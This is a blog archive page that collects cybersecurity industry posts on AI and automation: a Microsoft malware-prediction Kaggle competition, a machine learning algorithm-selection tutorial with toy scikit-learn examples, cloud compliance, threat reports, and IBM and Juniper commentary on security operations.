Category Archives: artificial intelligence

Microsoft AI competition explores the next evolution of predictive technologies in security

Predictive technologies are already effective at detecting and blocking malware at first sight. A new malware prediction competition on Kaggle will challenge the data science community to push these technologies even further: to stop malware before it is even seen.

The Microsoft-sponsored competition calls for participants to predict if a device is likely to encounter malware given the current machine state. Participants will build models using 9.4GB of anonymized data from 16.8M devices, and the resulting models will be scored by their ability to make correct predictions. Winning teams get $25,000 in total prizes.

The competition provides academics and researchers with varied backgrounds a fresh opportunity to work on a real-world problem using a new dataset from Microsoft. Results from the contest will help us identify opportunities to further improve Microsoft's layered defenses, focusing on preventative protection. Not all machines are equally likely to get malware; competitors will help build models for identifying devices that have a higher risk of getting malware so that preemptive action can be taken.

Cybersecurity is the central challenge of our digital age. Today, Windows Defender Advanced Threat Protection (Windows Defender ATP) uses intelligent systems to protect millions of devices against cyberattacks every day. Machine learning and artificial intelligence drive cloud-delivered protections that catch and predict new and emerging threats.

We also believe in the power of working with the broader research community to stay ahead of threats. Microsoft's 2015 malware classification competition on Kaggle was a huge success, with the dataset provided by Microsoft cited in more than 50 research papers in multiple languages. To this day, the 0.5TB dataset from that competition is still used for research and continues to produce value for Microsoft and the data science community. This new competition is organized by the Windows Defender ATP Research team, in cooperation with Northeastern University and Georgia Institute of Technology as academic partners, with the goal of bringing new ideas to the fight against malware attacks and breaches.

Kaggle is a platform for data scientists to create data science projects, download datasets, and participate in contests. Microsoft is happy to use the Kaggle platform to engage a rich community of amazing thinkers. We think this collaboration will result in better protection for Microsoft customers and the Internet at large. Stay tuned for the results; we can't wait to see what the data science community comes up with!

Click here to join the competition.

Chase Thomas and Robert McCann
Windows Defender Research team

Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.

The post Microsoft AI competition explores the next evolution of predictive technologies in security appeared first on Microsoft Secure.

AI Set to Supercharge Phishing in 2019

The coming year will see a mix of old and new as phishing is supercharged with AI but reported vulnerabilities continue to cause organizations problems, according to Trend Micro. …

The post AI Set to Supercharge Phishing in 2019 appeared first on The Cyber Security Place.

Leveraging AI and automation for successful DevSecOps

As engineering teams try to innovate at a faster pace, maintaining the quality, performance and security of their applications becomes much more important. Organizations have found huge success in improving overall product quality while ensuring that security controls and compliance requirements are met. AI-driven automation solutions have aided engineering teams by automating key processes and leveraging predictive analytics to identify issues before they occur and take corrective action, improving the overall product … More

The post Leveraging AI and automation for successful DevSecOps appeared first on Help Net Security.

Continuous Compliance Eases Cloud Adoption for Financial Services Firms

Last month, I spoke during the Innovation Showcase at the Financial Services Information Sharing and Analysis Center (FS-ISAC) Fall Summit. The goal was to update this group of high-level security professionals on a continuous compliance managed services solution that helps solve the cloud compliance dilemma — and on the solution’s first successful implementation. In a consortium of more than 30 financial services firms building an industry-standard cloud control framework, almost all reported regulatory compliance as a major hurdle to cloud adoption.

Overcome the Challenges of Cloud Compliance

Financial institutions are eager to use the hybrid cloud as a productive workplace to achieve strategic goals. But as reported in our white paper, “Turning Regulatory Challenges of the Cloud Into Competitive Advantage,” firms must overcome three major cloud adoption challenges.

First, companies face different regulatory obligations in various geographies. Multinational organizations must map regulatory obligations across 26 different countries and jurisdictions, in locations as far-flung as Singapore, London and New York.

Second, cloud service providers (CSPs) often provide different levels of control in the cloud than in the data center. That leaves financial services firms to build the right controls to address how they store and use data and who can access it — wherever it is. Regulators express concern over the amount of sensitive information CSPs maintain, often without being subject to the stringent regulations that govern banks, according to Business Insider.

Third, financial services firms and CSPs need a common security framework. A major accomplishment was reaching a consensus among the consortium members on the Cloud Security Alliance (CSA) open source framework. Modifications make it possible to build a single framework that is fully integrated with risk management and cybersecurity controls.

Lay the Groundwork for Continuous Compliance

Our managed services solution helps answer these challenges with continuous compliance to meet requirements for workloads running on public clouds — not only for regulations impacting the cloud, but also for the General Data Protection Regulation (GDPR) and rules from the Financial Industry Regulatory Authority (FINRA), the U.S. Securities and Exchange Commission (SEC) and other regulatory bodies. The solution was developed in three stages.

1. Build a Regulatory Database for All Geographies

A continuous compliance database maps to every regulatory authority around the world. The database also defines GDPR and other cybersecurity obligations. The service monitors changes and makes timely updates to an industry-standard cloud control framework and regulatory database.

2. Map All of the Regulations and Controls to Each CSP

Mapping to CSPs is critical to achieve a standard level of control and to meet or exceed controls financial services firms might use within their own firewalls. Our solution maps a standard set of controls to every CSP, whether it’s Amazon, Google, Microsoft or IBM.

3. Adapt the Solution to the Individual Financial Services Firm

Each financial services firm already maintains in-house controls. The managed services solution requires an adapter to map the standardized framework to the existing framework for each firm’s individual policies, standards and procedures.

Continuous Compliance in Action

One of the largest investment firms in the world recently implemented the continuous compliance managed services solution with impressive success. A team of back-office personnel previously spent each day combing the internet for new and changing legislation and determining the impacts on current controls. The employees made updates manually.

The work was painstaking, tedious, and labor- and time-intensive, but these compliance employees formed the firm's frontline defense against regulatory risk. Our managed services solution will enable the firm to reduce its staff while saving substantially on compliance costs and reducing the risk of regulatory fines and reputational damage.

Automate Compliance With Cognitive Computing

Compliance is not a one-time event, but rather an ongoing process of monitoring and maintaining. Automation and cognitive computing — including artificial intelligence (AI) and machine learning — are the engines behind better, more efficient cloud governance.

In the future, the continuous compliance service will use Watson for RegTech. Watson will initially ingest existing regulations. Then, Watson will not only identify changes and update regulations, but also revise the controls that correspond with each regulation. Once Watson is fully trained, the time to add a new regulation or update an existing one will shrink dramatically.

Transfer to Other Obligations, Technologies and Domains

Financial services firms ultimately need to be in complete, real-time alignment with their regulatory obligations worldwide. Firms can access the industry-standard database to consume and adapt to updates for policies, requirements and controls while still maintaining their own firm-specific controls and processes. Our managed services solution mainly covers financial services regulations for cloud computing. Going forward, look for the scope to extend to regulations covering myriad technologies and domains to help financial institutions of all stripes overcome their broader cloud adoption challenges.

Read the white paper: Turning the regulatory challenges of cloud into competitive advantage

The post Continuous Compliance Eases Cloud Adoption for Financial Services Firms appeared first on Security Intelligence.

Artificial Intelligence and Cybersecurity: Attacking and Defending

Cybersecurity is a manpower-constrained market – therefore, the opportunities for artificial intelligence (AI) automation are vast. Frequently, AI is used to make certain defensive aspects of cybersecurity more wide-reaching and effective. Combating spam and detecting malware are prime examples. On the opposite side, there are many incentives to use AI when attempting […]… Read More

The post Artificial Intelligence and Cybersecurity: Attacking and Defending appeared first on The State of Security.

10 trends impacting infrastructure and operations for 2019

Gartner highlighted the key technologies and trends that infrastructure and operations (I&O) leaders must start preparing for to support digital infrastructure in 2019. “More than ever, I&O is becoming increasingly involved in unprecedented areas of the modern day enterprise. The focus of I&O leaders is no longer to solely deliver engineering and operations, but instead deliver products and services that support and enable an organization’s business strategy,” said Ross Winser, Senior Director, Analyst at Gartner. … More

The post 10 trends impacting infrastructure and operations for 2019 appeared first on Help Net Security.

Machine Learning Algorithms Are Not One-Size-Fits-All

This is the second installment in a three-part series about machine learning. Be sure to read part one for the full story.

When designing machine learning solutions for security, it’s important to decide on a classifier that will perform the best with minimal error. Given the sheer number of choices available, it’s easy to get confused. Let’s explore some tips to help security leaders select the right machine learning algorithm for their needs.

4 Types of Machine Learning Techniques

If you know which category your problem falls into, you can narrow down your choices. Machine learning algorithms are broadly categorized under four types of learning problems.

1. Supervised Learning

Supervised learning trains the algorithm based on example sets of input/output pairs. The goal is to develop new inferences based on patterns inferred from the sample results. Sample data must be available and labeled. For example, designing a spam detector model by learning from samples labeled spam/nonspam is supervised learning. Another example is the 1999 Knowledge Discovery and Data Mining challenge (KDD-99), built on Defense Advanced Research Projects Agency (DARPA) intrusion detection data, in which contestants competed to design a machine learning-based intrusion detection system (IDS) from a set of 41 features per instance, each labeled either “attack” or “normal.”
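
To make the spam example concrete, here is a minimal supervised learning sketch. The library choice (scikit-learn) and the tiny labeled corpus are illustrative assumptions, not any production detector:

    # Toy supervised learning: a bag-of-words spam classifier.
    # The labeled samples are invented for illustration only.
    from sklearn.feature_extraction.text import CountVectorizer
    from sklearn.naive_bayes import MultinomialNB

    texts = [
        "win a free prize now", "cheap meds online",           # spam
        "meeting moved to 3pm", "quarterly report attached",   # nonspam
    ]
    labels = [1, 1, 0, 0]  # 1 = spam, 0 = nonspam

    vectorizer = CountVectorizer()              # word counts as features
    X = vectorizer.fit_transform(texts)         # the "input" side of each pair
    model = MultinomialNB().fit(X, labels)      # learn from the labeled samples

    print(model.predict(vectorizer.transform(["free prize meds"])))  # -> [1]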

2. Unsupervised Learning

Unsupervised learning uses data that has not been labeled, classified or categorized. The machine is challenged to identify patterns through processes such as clustering, and the outcome is usually unknown. Clustering is a task in which samples are compared with each other in an attempt to find examples that are close to each other, usually by either a measure of density or a distance metric, such as Euclidean distance, when the samples are projected into a high-dimensional space.

A security problem that falls into this category is network anomaly detection, which is a different method of designing an IDS. In this case, the algorithm doesn’t assume that it knows an attack from a normal input. Instead, the algorithm tries to understand what normal traffic is by watching the network in a (hopefully) clean state so that it can learn the patterns of traffic. Then, anything that falls outside of this “normal” region is a possible attack. Note that there is a great deal of uncertainty with these algorithms because they do not actually know what an attack looks like.
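
As a rough sketch of that idea (the synthetic numbers stand in for per-connection features, and the three-sigma threshold is one simple choice among many), we can cluster “normal” traffic and flag anything far from every cluster center:

    # Toy unsupervised anomaly detection: learn normal traffic, flag outliers.
    import numpy as np
    from sklearn.cluster import KMeans

    rng = np.random.default_rng(0)
    # Pretend features per connection: [bytes transferred, duration in seconds]
    normal_traffic = rng.normal(loc=[500.0, 1.0], scale=[50.0, 0.2], size=(200, 2))

    km = KMeans(n_clusters=3, n_init=10, random_state=0).fit(normal_traffic)
    dist_to_center = km.transform(normal_traffic).min(axis=1)
    threshold = dist_to_center.mean() + 3 * dist_to_center.std()  # "normal" region

    new_event = np.array([[5000.0, 9.0]])          # an unusually large transfer
    print(km.transform(new_event).min(axis=1) > threshold)  # -> [ True ]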

3. Semisupervised Learning

This type of learning uses a combination of labeled and unlabeled data, typically with the majority being unlabeled. It is primarily used to provide some concept of a known classification to unsupervised algorithms. Several techniques, such as label spreading and weakly supervised learning, can also be employed to augment a supervised training set from a small number of labeled samples. This area attracts a great deal of work because partially labeled data is an extremely common scenario.

For the challenge of exploit kit identification, for example, we can find some known exploit kits to train our model, but there are many variants and unknown kits that can’t be labeled. Semisupervised learning can help solve this problem. Note that semisupervised and fully supervised learning can often be differentiated by the choice of features to learn against: depending on the features chosen, you may be able to label far more of your data than you could with a different feature set.
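
A minimal sketch of the semisupervised idea, using scikit-learn’s label spreading on toy one-dimensional data (the data and parameters are illustrative assumptions only):

    # Toy semisupervised learning: two labeled points, four unlabeled ones.
    # scikit-learn marks unlabeled samples with -1.
    import numpy as np
    from sklearn.semi_supervised import LabelSpreading

    X = np.array([[0.0], [0.1], [0.2], [5.0], [5.1], [5.2]])
    y = np.array([0, -1, -1, 1, -1, -1])      # mostly unlabeled, as is typical

    model = LabelSpreading(kernel="knn", n_neighbors=2).fit(X, y)
    print(model.transduction_)                # labels spread to all six samples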

4. Reinforcement Learning

Unlike the other three types of learning problems, reinforcement learning seeks the optimal path to a desired result by rewarding improvement. The problem set is generally small and the training data well-understood. An example is a generative adversarial network (GAN) such as this experiment, in which the distance, measured in correct and incorrect bits, was used as a loss function to encrypt messages between two neural networks.

Another example is PassGAN, where a GAN was trained to guess passwords more efficiently and the reinforcement function, at a very high level, was how many passwords it guessed correctly. Specifically, PassGAN learned rules to take a dictionary and create likely passwords based on an actual set of leaked passwords. It modeled human behavior in guessing the ways that humans transformed passwords into nondictionary character strings.

Problem Type and Training Data

Another, broader categorization of algorithm is based on the type of problem, such as classification, regression, anomaly detection or dimensionality reduction. There are specific machine learning algorithms designed for each type of problem.

Once you have narrowed down your choices based on the above broader categories, you should consider the algorithm’s bias or variance.

In practical effect, bias describes how closely an algorithm can model the training data; it represents the distance between the model’s predictions and the training data. A high bias results in the model missing relationships between features and the target variable, which leads to what is known as underfitting.

Variance describes how strongly the model responds to noise in the distribution of training samples. A high variance means that random fluctuations are captured as if they were signal. Obviously, we do not want this either; therefore, we seek to minimize both of these values. We can control bias and variance through different parameters. For example, the k-nearest neighbors algorithm with a high value of k gives us high bias and low variance. This makes sense because a high k averages each prediction over many neighbors, smoothing the decision boundary, so more of the relationships between the features and the target will be missed as the algorithm fits the data more coarsely.
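
The effect is easy to see empirically. In this illustrative sketch (synthetic data, arbitrary values of k), a tiny k memorizes the training set while a very large k smooths real structure away:

    # Bias and variance as k varies in k-nearest neighbors (synthetic data).
    from sklearn.datasets import make_classification
    from sklearn.model_selection import train_test_split
    from sklearn.neighbors import KNeighborsClassifier

    X, y = make_classification(n_samples=400, n_features=10, flip_y=0.1,
                               random_state=0)
    X_tr, X_te, y_tr, y_te = train_test_split(X, y, random_state=0)

    for k in (1, 15, 101):
        knn = KNeighborsClassifier(n_neighbors=k).fit(X_tr, y_tr)
        print(f"k={k:3d}  train={knn.score(X_tr, y_tr):.2f}  "
              f"test={knn.score(X_te, y_te):.2f}")
    # k=1: near-perfect train score but a weaker test score (high variance).
    # Very large k: both scores sag as real structure is smoothed away (high bias).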

A deeper decision tree has more variance because it contains more branches (decision points) and therefore has more false relationships that model noise in the training data. For artificial neural networks (ANNs), variance increases and bias decreases with the increase in the number of layers. Therefore, deep learning has a very low bias. However, this is at the cost of more noise being represented in the deep learning models.

Other Considerations for Selecting Machine Learning Algorithms

Data type also dictates the choice of algorithm because some algorithms work better on certain data types than others. For example, support vector machines (SVMs), linear and logistic regression, and neural networks require the feature vector to be numerical. On the other hand, decision trees can be more flexible to different data types, such as nominal input.

Some algorithms perform poorly when there is correlation between the features — meaning that multiple features demonstrate the same patterns. A feature that is defined as the result of calculations based on other features would be highly correlated with those input features. Linear regression and logistic regression, along with other algorithms, require regularization to avoid numerical instabilities that come from redundancy in data.
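
As an illustrative sketch (synthetic data; L2, scikit-learn’s default penalty, stands in for “regularization”), redundancy is easy to detect with a correlation matrix before training:

    # Detecting feature correlation, then fitting a regularized model anyway.
    import numpy as np
    from sklearn.linear_model import LogisticRegression

    rng = np.random.default_rng(1)
    x1 = rng.normal(size=300)
    x2 = 2.0 * x1 + rng.normal(scale=0.01, size=300)   # near-duplicate feature
    X = np.column_stack([x1, x2])
    y = (x1 + rng.normal(scale=0.5, size=300) > 0).astype(int)

    print(np.corrcoef(X, rowvar=False)[0, 1])   # ~1.0: the features are redundant

    # LogisticRegression applies an L2 penalty by default, which keeps the
    # weights on redundant columns from blowing up against each other.
    model = LogisticRegression(C=1.0).fit(X, y)
    print(model.coef_)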

The relationship between independent and dependent variables can also help us determine which algorithm to choose. Because naive Bayes, linear regression and logistic regression perform well if each feature has an independent contribution to the output, these algorithms are poor choices for correlated data. Unfortunately, when features are extracted from voluminous data, it is often impossible to know whether the independence assumption holds true without further analysis. If the relationship is more complex, decision trees or neural networks may be a better choice.

Noise in the output values can also inform which algorithm to choose, as well as the parameters for your selected algorithm. However, you are best served by cleaning the data of noise. If you can’t clean the data, you will most likely receive results with poor classification boundaries. An SVM, for example, is very sensitive to noise because it attempts to draw a margin, or boundary, between or among the classes of the data as they are labeled. A decision tree or bagged tree such as a random forest might be a better choice here since these allow for the tree(s) to be pruned. A shallower tree models less noise.
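
One quick way to feel this out is to flip a fraction of the training labels and compare classifiers. This sketch uses synthetic data and default settings, so treat the exact numbers as illustrative:

    # Comparing an SVM to a depth-limited ("pruned") tree under label noise.
    from sklearn.datasets import make_classification
    from sklearn.model_selection import train_test_split
    from sklearn.svm import SVC
    from sklearn.tree import DecisionTreeClassifier

    X, y = make_classification(n_samples=600, n_features=8, flip_y=0.25,
                               random_state=0)        # 25% of labels flipped
    X_tr, X_te, y_tr, y_te = train_test_split(X, y, random_state=0)

    svm = SVC().fit(X_tr, y_tr)
    shallow = DecisionTreeClassifier(max_depth=3, random_state=0).fit(X_tr, y_tr)
    deep = DecisionTreeClassifier(max_depth=None, random_state=0).fit(X_tr, y_tr)

    print("SVM         :", svm.score(X_te, y_te))
    print("shallow tree:", shallow.score(X_te, y_te))  # models less of the noise
    print("deep tree   :", deep.score(X_te, y_te))     # chases the noisy labels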

Dimensionality of the input space is critical to your decision as well. In dimensionality, there are two common phenomena that are directly at odds with each other. First, the so-called curse of dimensionality occurs when the data contains a very large number of features. If you think about this in spatial terms, a two-dimensional figure versus a three-dimensional figure can look very different. A very packed set of points on a plane can become spread apart once we add the third dimension. If we try to cluster these points, the distances between two arbitrary points will dramatically increase.

Alternatively, the blessing of dimensionality means that having more dimensions helps us model the problem more completely. In this sense, the plane may pack completely unrelated points together because the two-dimensional coordinates are close to each other even though they have nothing to do with each other. In three dimensions, these points might be spread farther apart, showing us a more complete separation of the unrelated points.
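
The statistical side of these two phenomena is simple to demonstrate. In the sketch below (random points in a unit cube; the dimensions are chosen arbitrarily), the mean pairwise distance grows while the relative spread shrinks:

    # How pairwise distances behave as dimensions are added.
    import numpy as np
    from scipy.spatial.distance import pdist

    rng = np.random.default_rng(0)
    for d in (2, 3, 100, 1000):
        points = rng.random((200, d))     # 200 random points in the unit cube
        dists = pdist(points)             # all pairwise Euclidean distances
        print(f"d={d:5d}  mean={dists.mean():7.2f}  "
              f"relative spread={dists.std() / dists.mean():.3f}")
    # Points that looked packed together in 2-D spread apart in higher
    # dimensions, and all distances start to look alike, which is exactly
    # what makes clustering boundaries hard to draw.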

These two ideas cause us, as domain experts and deep learning designers, to pick our features carefully. We do not want to encounter the sparsity of the curse of dimensionality because there might not be a clear boundary, but we also do not want to pack our unrelated examples too close to each other and create an unusable boundary. Some algorithms work better in higher dimensions. In very high dimensional space, for example, you might choose a boosted random forest or a deep learning model.

Transparency and Functional Complexity

The level of visibility into the model’s decision process is a very important criterion for selecting an algorithm. Algorithms that provide decision trees show clearly how the model reached a decision, whereas a neural network is essentially a black box.
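
scikit-learn makes the contrast easy to see: a fitted tree can print its decision logic as plain if/then rules. The iris dataset here is just a stand-in for any labeled security data:

    # A decision tree's reasoning, exported as readable rules.
    from sklearn.datasets import load_iris
    from sklearn.tree import DecisionTreeClassifier, export_text

    data = load_iris()
    tree = DecisionTreeClassifier(max_depth=2, random_state=0)
    tree.fit(data.data, data.target)

    print(export_text(tree, feature_names=list(data.feature_names)))
    # The printed if/then splits are an audit trail that a neural network's
    # weight matrices do not provide.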

Similarly, you should consider functional complexity and the amount of training data. Functional complexity can be understood in terms of things like speed and memory usage. If you lack sufficient computational power or memory in the machine on which your model will be run, you should choose an algorithm such as naive Bayes or one of the many rules generator-based algorithms. Naive Bayes counts the frequencies of terms, so its model is only as big as the number of features in the data. Rules generators essentially create a series of if/then conditions that the data must satisfy to be classified correctly. These are very good for low-complexity devices. If, however, you have a good deal of power and memory, you might go so far as deep learning, which (in most but not all configurations) requires many more resources.

How Much Training Data Do You Need?

You might also opt for naive Bayes if you have a smaller set of training data available. A small training data size will severely limit you, so it is always best to acquire as much data as you can. A few hundred samples might be enough to construct a shallow decision tree or a naive Bayesian model. A few thousand to tens of thousands is usually enough to create an effective random forest, an algorithm that performs very well in most learning problems. Finally, if you want to try deep learning, you may need hundreds of thousands — or, preferably, millions — of training examples, depending on how many layers you want your deep learning model to have.

Try Several Classifiers and Pick the Best

When all else fails, try several classifiers that are suitable for your problem and then compare the results. Key metrics include accuracy of the model and true and false positive rates; derived metrics such as precision, recall and F1; and even metrics as complex as area under the receiver operating characteristic curve (AUC) and area under the precision-recall curve (AUPRC). Each measurement tells you something different about the model’s performance. We’ll define these metrics in greater detail in the final installment of our three-part series.
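
As a small, self-contained sketch (the label vectors are invented), all of these metrics are one call away in scikit-learn:

    # Computing the key evaluation metrics from a model's predictions.
    from sklearn.metrics import (accuracy_score, average_precision_score,
                                 f1_score, precision_score, recall_score,
                                 roc_auc_score)

    y_true  = [0, 0, 1, 1, 1, 0, 1, 0]                   # ground truth
    y_pred  = [0, 1, 1, 1, 0, 0, 1, 0]                   # hard predictions
    y_score = [0.2, 0.6, 0.8, 0.9, 0.4, 0.1, 0.7, 0.3]   # model confidence

    print("accuracy :", accuracy_score(y_true, y_pred))
    print("precision:", precision_score(y_true, y_pred))
    print("recall   :", recall_score(y_true, y_pred))
    print("F1       :", f1_score(y_true, y_pred))
    print("AUC      :", roc_auc_score(y_true, y_score))            # ROC area
    print("AUPRC    :", average_precision_score(y_true, y_score))  # PR area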

The post Machine Learning Algorithms Are Not One-Size-Fits-All appeared first on Security Intelligence.

Researchers create AI that could spell the end for website security captchas

Researchers have created new artificial intelligence that could spell the end for one of the most widely used website security systems. The new algorithm, based on deep learning methods, is the most effective solver of captcha security and authentication systems to date and is able to defeat versions of text captcha schemes used to defend the majority of the world’s most popular websites. Text-based captchas use a jumble of letters and numbers, along with other … More

The post Researchers create AI that could spell the end for website security captchas appeared first on Help Net Security.

New ‘Under the Radar’ report examines modern threats and future technologies

As if you haven’t heard it enough from us, the threat landscape is changing. It’s always changing, and usually not for the better.

The new malware we see being developed and deployed in the wild has features and techniques that allow it to go beyond what it was originally able to do, either for the purpose of further infection or evasion of detection.

To that end, we decided to take a look at a few of these threats and pick apart what makes them so difficult to detect, able to remain just out of sight and silently spread across an organization.

 Download: Under the Radar: The Future of Undetected Malware

We then examine what technologies are unprepared for these threats, which modern tech is actually effective against these new threats, and finally, where the evolution of these threats might eventually lead.

The threats we discuss:

  • Emotet
  • TrickBot
  • Sorebrect
  • SamSam
  • PowerShell, as an attack vector

While discussing these threats, we also look at where they are most commonly found in the US, APAC, and EMEA regions.

Emotet 2018 detections in the United States

In doing so, we discovered interesting trends that raise new questions, some with clear answers and others that need more digging. Regardless, it is evident that these threats are not old hat; they are making bigger and bigger splashes as the year goes on, in interesting and sometimes unexpected ways.

Sorebrect ransomware detections in APAC region

Though the spread and capabilities of future threats are unknown, we have to prepare people to protect their data and experiences online. Unfortunately, many older security solutions will not be able to combat future threats, let alone what is out there now.

Not all is bad news in security, though, as we have a lot going for us in technological developments and innovations in modern features. For example:

  • Behavioral detection
  • Blocking at delivery
  • Self-defense modes

These features are effective at combating today’s threats and will form the basis for defending against future developments, such as:

  • Artificial Intelligence being used to develop, distribute, or control malware
  • The continued development of fileless and “invisible” malware
  • Businesses becoming worm food for future malware

Download: Under the Radar: The Future of Undetected Malware

The post New ‘Under the Radar’ report examines modern threats and future technologies appeared first on Malwarebytes Labs.

How Can Government Security Teams Overcome Obstacles in IT Automation Deployment?

IT automation has become an increasingly critical tool used by enterprises around the world to strengthen their security posture and mitigate the cybersecurity skills shortage. But most organizations don’t know how, when or where to automate effectively, as noted in a recent report by Juniper Networks and the Ponemon Institute.

According to “The Challenge of Building the Right Security Automation Architecture,” only 35 percent of organizations have employees on hand who are experienced enough to respond to threats using automation. The majority of organizations (71 percent) ranked integrating disparate security technologies as the primary obstacle they have yet to overcome as they work toward an effective security automation architecture.

The report pointed out that the U.S. government is likely to struggle with IT automation as well, but there is much that it can learn from the private sector to help streamline the process.

How Hard Can IT Automation Be?

According to the study’s findings, enterprises are struggling to implement automation tools because of the lack of expertise currently available.

Juniper’s head of threat research, Mounir Hahad, and its head of federal strategy, David Mihelcic, said the U.S. government will “definitely struggle with automation as much, if not more than the private sector.”

About half (54 percent) of the survey’s respondents reported that detecting and responding to threats is made easier with automation technologies. Of the 1,859 IT and IT security practitioners in the U.S., the U.K., Germany and France, 64 percent found a correlation between automation and the increased productivity of security personnel.

Be Cautiously Optimistic

Indeed, there is good news for government security teams. Technology Modernization Fund (TMF) awards are now available as an initiative of the Modernizing Government Technology Act (MGT). The Departments of Energy, Agriculture, and Housing and Urban Development were the first three agencies to receive a combined total of $45 million in TMFs, according to FedScoop.

More government agencies will likely apply for some of the $55 million that remains available for 2018. While there’s a strong likelihood that agencies will continue to invest in automation with some portion of these funds, Juniper Networks warned that they shouldn’t expect an easy deployment.

“The cybercrime landscape is incredibly vast, organized and automated — cybercriminals have deep pockets and no rules, so they set the bar,” said Amy James, director of security portfolio marketing at Juniper Networks, in a press release. “Organizations need to level the playing field. You simply cannot have manual security solutions and expect to successfully battle cybercriminals, much less get ahead of their next moves. Automation is crucial.”

Why Automate?

With so many IT teams unable to recruit sufficient talent to implement automation tools, David “Moose” Wolpoff, chief technology officer (CTO) and co-founder of Randori, questioned why organizations are considering them as part of their security infrastructure in the first place.

“Based on [Juniper’s] findings, I get the impression that government entities may be feeling the same way, buying a bunch of automation tools without knowing quite how or why they are going to use them,” Wolpoff said.

Organizations that dive headfirst into implementing automation, whether government entities or not, will likely run into problems if they fail to plan with business objectives in mind.

“Automation isn’t a solution, it’s a force-multiplier,” explained Wolpoff. “If it’s not enabling your objectives, then you’re just adding a useless tool to your toolbox. My advice to government security teams planning to implement automation would be to sit down with leadership to discuss not only what you want to gain from automation, but where automation makes sense and what it will take to successfully implement.”

Three Tips to Deploy Automation Thoughtfully

Given the need for interoperability within and across the sundry components of different agencies, many conversations about automation will likely result in a green light for implementation. If that’s the case, Hahad offered these three steps security teams can take to overcome IT obstacles.

1. Start With Basic Tasks

Security teams should start by automating administrative tasks before implementing more advanced processes such as event-driven automation once IT departments gain experience.

Too often, organizations bite off more than they can chew when it comes to implementing automation tools, by either misdeploying them or deploying more than they can fully take advantage of. This will only further complicate processes.

2. Collaborate Across Agencies

Replacing legacy systems and deploying automation tools will require much closer collaboration across teams and agencies to identify which framework and architecture they should adopt. A lack of coordination will result in a patchwork of architectures, vendors and tools, which could produce significant gaps and redundancies.

3. Fully Embrace Automation

IT teams are traditionally hesitant to remove the human element from processes, fearing the system will block something critical and cause more problems. If an agency invests in automating its security tools, it should automate across the security processes — from detection and alerting to incident response. The more tasks automation can manage, the more teams will be empowered to complete higher-level work.

It’s important to identify the additional capabilities that don’t require a lot of heavy lifting but will result in saving both time and money. You can avoid unnecessary additional costs that will delay deployment by talking with other agencies that have gone through a similar process.

Depending on how deeply automated those organizations are, it may be appropriate to share experiences to streamline deployments. In the end, streamlining and simplifying programs for every team is the ultimate goal of automation.

The post How Can Government Security Teams Overcome Obstacles in IT Automation Deployment? appeared first on Security Intelligence.

SNDBOX: AI-Powered Online Automated Malware Analysis Platform

Looking for automated malware analysis software? Something like a 1-click solution that doesn't require any installation or configuration… a platform that can scale up your research time… technology that can provide data-driven explanations… well, your search is over! Israeli cybersecurity and malware researchers today at the Black Hat conference launched a revolutionary machine learning and …

Fight Evolving Cybersecurity Threats With a One-Two-Three Punch

When I became vice president and general manager for IBM Security North America, the staff gave me an eye-opening look at the malicious hackers who are infiltrating everything from enterprises to government agencies to political parties. The number of new cybersecurity threats is distressing, doubling from four to eight new malware samples per second between the third and fourth quarters of 2017, according to McAfee Labs.

Yet that inside view only increased my desire to help security professionals fulfill their mission of securing organizations against cyberattacks through client and industry partnerships, advanced technologies such as artificial intelligence (AI), and incident response (IR) training on the cyber range.

Cybersecurity Is Shifting From Prevention to Remediation

Today, the volume of threats is so overwhelming that getting ahead is often unrealistic. It’s not a matter of if you’ll have a breach, it’s a matter of when — and how quickly you can detect and resolve it to minimize damage. With chief information security officers (CISOs) facing a shortage of individuals with the necessary skills to design environments and fend off threats, the focus has shifted from prevention to remediation.

To identify the areas of highest risk, just follow the money to financial institutions, retailers and government entities. Developed countries also face greater risks. The U.S. may have advanced cybersecurity technology, for example, but we also have assets that translate into greater payoffs for attackers.

Remediation comes down to visibility into your environment that allows you to notice not only external threats, but internal ones as well. In fact, internal threats create arguably the greatest vulnerabilities. Users on the inside know where the networks, databases and critical information are, and often have access to areas that are seldom monitored.

Bring the Power of Partnerships to Bear

Once you identify a breach, you’ll typically have minutes or even seconds to quarantine it and remediate the damage. You need to be able to leverage the data available and make immediate decisions. Yet frequently, the tools that security professionals use aren’t appropriately implemented, managed, monitored or tuned. In fact, 44 percent of organizations lack an overall information security strategy, according to PwC’s “The Global State of Information Security Survey 2018.”

Organizations are beginning to recognize that they cannot manage cybersecurity threats alone. You need a partner that can aggregate data from multiple clients and make that information accessible to everyone, from customers to competitors, to help prevent breaches. It’s like the railroad industry: Union Pacific, BNSF and CSX may battle for business, but they all have a vested interest in keeping the tracks safe, no matter who is using them.

Harden the Expanding Attack Surface

Along with trying to counteract increasingly sophisticated threats, enterprises must also learn how to manage the data coming from a burgeoning number of Internet of Things (IoT) devices. This data improves our lives, but the devices give attackers even more access points into the corporate environment. That’s where technology that manages a full spectrum of challenges comes into play. IBM provides an immune system for security from threat intelligence to endpoint management, with a host of solutions that harden your organization.

Even with advanced tools, analysts don’t always have enough hours in the day to keep the enterprise secure. One solution is incorporating automation and AI into the security operations center (SOC). We layer IBM Watson on top of our cybersecurity solutions to analyze data and make recommendations. And as beneficial as AI might be on day one, it delivers even more value as it learns from your data. With increasing threats and fewer resources, any automation you can implement in your cybersecurity environment helps get the work done faster and smarter.

Make Incident Response Like Muscle Memory

I mentioned malicious insider threats, but users who don’t know their behavior creates vulnerabilities are equally dangerous — even if they have no ill intent. At IBM, for example, we no longer allow the use of thumb drives since they’re an easy way to compromise an organization. We also train users from myriad organizations on how to react to threats, such as phishing scams or bogus links, so that their automatic reaction is the right reaction.

This is even more critical for incident response. We practice with clients just like you’d practice a golf swing. By developing that muscle memory, it becomes second nature to respond in the appropriate way. If you’ve had a breach in which the personally identifiable information (PII) of 100,000 customers is at risk — and the attackers are demanding payment — what do you say? What do you do? Just like fire drills, you must practice your IR plan.

Additionally, security teams need training to build discipline and processes, react appropriately and avoid making mistakes that could cost the organization millions of dollars. Response is not just a cybersecurity task, but a companywide communications effort. Everyone needs to train regularly to know how to respond.

Check out the IBM X-Force Command Cyber Tactical Operations Center (C-TOC)

Fighting Cybersecurity Threats Alongside You

IBM considers cybersecurity a strategic imperative and, as such, has invested extensive money and time in developing a best-of-breed security portfolio. I’m grateful for the opportunity to put it to work to make the cyber world a safer place. As the leader of the North American security unit, I’m committed to helping you secure your environments and achieve better business outcomes.

